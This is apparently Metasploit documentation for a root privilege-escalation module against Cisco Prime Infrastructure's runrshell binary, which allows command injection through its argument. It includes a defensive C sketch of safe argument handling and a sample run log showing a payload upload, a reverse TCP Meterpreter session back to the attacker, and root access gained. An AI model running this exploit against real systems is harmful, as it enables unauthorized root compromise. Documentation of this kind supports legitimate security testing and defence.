## Vulnerable Application
This module exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute
a shell script as root, but can be abused to inject extra commands in the argument, allowing you to execute anything as root.
It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 exploit.
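
For defenders reviewing similar root helpers, the following added example (not part of the module or of Cisco's code; runrshell's internals are not shown on this page) sketches how a privileged wrapper can accept a script name without letting the argument carry extra commands. `SCRIPT_DIR` and all function names are hypothetical.

```c
/* Added illustration: argument handling for a root helper that runs one
 * script from a fixed directory. SCRIPT_DIR and the function names are
 * hypothetical; this is not Cisco's runrshell code. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define SCRIPT_DIR "/opt/helper/scripts/"   /* assumed install path */

/* Accept only a bare script name: [A-Za-z0-9_-]+ followed by ".sh".
 * Spaces, quotes, ';', '|', '$', '/' and ".." all fail the allowlist. */
int is_safe_script_name(const char *name)
{
    static const char ok[] = "abcdefghijklmnopqrstuvwxyz"
                             "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-";
    size_t len = strlen(name);
    if (len < 4 || len > 64) return 0;
    if (strcmp(name + len - 3, ".sh") != 0) return 0;
    /* every character before the final ".sh" must be in the allowlist */
    return strspn(name, ok) == len - 3;
}

/* Build the full path; returns 0 on success, -1 if the name is rejected
 * or the buffer is too small. */
int build_script_path(const char *name, char *out, size_t outlen)
{
    if (!is_safe_script_name(name)) return -1;
    int n = snprintf(out, outlen, "%s%s", SCRIPT_DIR, name);
    return (n > 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Hardened launch: the caller's input is never parsed as a command line,
 * and the environment is replaced so PATH/IFS/LD_* are not inherited. */
int run_script(const char *name)
{
    char path[128];
    if (build_script_path(name, path, sizeof path) != 0) return -1;
    char *const argv[] = { "/bin/sh", path, NULL };
    char *const envp[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    execve("/bin/sh", argv, envp);
    return -1;                      /* only reached if execve failed */
}

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <script.sh>\n", argv[0]); return 2; }
    return run_script(argv[1]) == 0 ? 0 : 1;
}
```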
## Scenarios
```
msf5 exploit(linux/local/cpi_runrshell_priv_esc) > run

[*] Started reverse TCP handler on 192.168.0.21:4444
[*] Uploading /tmp/mYVrqmsETa.bin
[*] chmod the file with +x
[*] Executing /tmp/mYVrqmsETa.bin
[*] Sending stage (985320 bytes) to 192.168.0.23
[*] Meterpreter session 4 opened (192.168.0.21:4444 -> 192.168.0.23:55554) at 2019-06-10 11:18:13 -0500
[+] Deleted /tmp/mYVrqmsETa.bin

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
```